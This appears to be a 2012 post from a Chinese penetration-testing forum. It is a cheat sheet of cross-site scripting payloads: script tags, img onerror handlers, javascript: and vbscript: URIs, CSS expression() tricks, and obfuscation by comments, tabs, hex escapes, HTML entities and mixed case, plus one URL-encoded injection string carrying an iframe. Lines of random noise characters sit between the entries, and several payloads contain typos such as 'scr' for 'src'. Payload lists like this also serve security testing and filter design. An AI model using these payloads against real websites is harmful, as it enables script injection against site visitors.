中国网络渗透测试联盟
标题:
xss
[打印本页]
作者:
admin
时间:
2012-9-15 14:09
标题:
xss
<script>alert("跨站")</script> (最常用)
3 B* P* i7 m( q& H6 c
<img scr=javascript:alert("跨站")></img>
5 w' s; g9 e! j( c, K" t
<img scr="javascript: alert(/跨站/)></img>
8 o8 T1 `; d! J% }; L7 ^/ \
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
1 ^' P& l! Q4 q& M0 U: |
<img scr="#" onerror=alert(/跨站/)></img>
+ z+ ?* s0 @, d' o
<img scr="#" style="xss:expression(alert(/xss/));"></img>
) q9 v( q3 P: p W& I
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
/ C! }4 b; u# n) s$ h2 e) F
<img src=vbscript:msgbox ("xss")></img>
f9 l. A+ P" S2 _0 S
<style> input {left:expression (alert('xss'))}</style>
0 v7 n! {; P0 h# i3 W- b: S r' O
<div style={left:expression (alert('xss'))}></div>
7 S5 ~) c: Z1 D' ]; G
<div style={left:exp/* */ression (alert('xss'))}></div>
, J, e" G3 @, S% E. I
<div style={left:\0065\0078ression (alert('xss'))}></div>
7 b/ p9 @% Q. B
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
. i$ r) Z3 H* D2 a H+ A. J. g' S
unicode <div style="{left:expRessioN (alert('xss'))}">
' |1 z: Z6 C& D( N9 \" u
$ N5 C- o, ?+ |8 _
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
+ ^- x; ?3 H5 j" o- F. v) x
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2